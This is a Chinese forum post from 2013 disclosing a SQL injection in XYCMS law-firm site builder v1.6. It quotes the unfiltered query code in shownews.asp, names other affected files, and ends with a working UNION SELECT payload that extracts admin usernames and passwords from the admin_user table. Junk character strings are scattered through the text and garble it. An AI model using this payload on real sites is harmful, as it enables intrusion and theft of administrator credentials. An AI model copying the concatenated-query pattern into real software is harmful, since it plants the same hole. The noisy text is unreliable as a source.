前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
( E( C% K+ q; a, q
0 I$ K0 f! K: M淫荡分割线
, ?# e# x2 s6 @# t% C/ d1 |--------------------------------------------------------! A" k; ~8 o9 Q
1 H7 N( E, \. d
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
# @/ z/ q# d2 A9 e1 [源码地址:http://down.chinaz.com/soft/29233.htm- H0 u" W1 ?+ `; W
, o2 _( z/ |- v8 v/ m: r: \8 e' U0 r2 c漏洞文件:shownews.asp
% [% F' w0 e3 m7 Q+ K漏洞代码:7-13行# `; x& h4 p- M b+ F
$ @$ [! n; V: E% H . ~! f6 ?: U- b3 E8 z* m
<%
4 P4 T4 R2 X& _0 p* g; {* K- n5 Wid=request.QueryString("id")$ k- Q# I( l1 a3 d+ L
, s$ O0 b: S" n: H& g4 n+ t- Sset snews=server.createobject("adodb.recordset") ! X0 d: P% E6 J( J3 K$ G
exec="select * from [news] where id="&id; j+ K$ v: o0 P% p( b
snews.open exec,conn,1,1; j1 o" }$ Q. m2 s
%>
* W' B K- ?" j n3 m" a2 o
: k" S u3 @+ _ l! L% _, C8 \ 9 F {- R% T) @# h6 Z1 K
什么过滤都没有 直造成注入8 r# y$ U" U1 I2 ~- Z6 ]2 ]
5 @- X1 Y/ A$ {0 ?
注入点:http://127.0.0.1:99/shownews.asp?id=xx; v/ c9 c- e& [- z+ J$ n
$ ~7 T* i) F' U: _7 e A其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找/ [& M4 {# t5 X, m2 }
: i, n; Q8 T. p7 J% B. R
7 ~7 K' y2 J. M: \8 L
exp: union select 1,admin,password,4,5,7 from admin_user
! y" e1 s. n0 {# n( U o% `3 ]
|
发表于 2013-4-4 17:28:12
收藏
支持
反对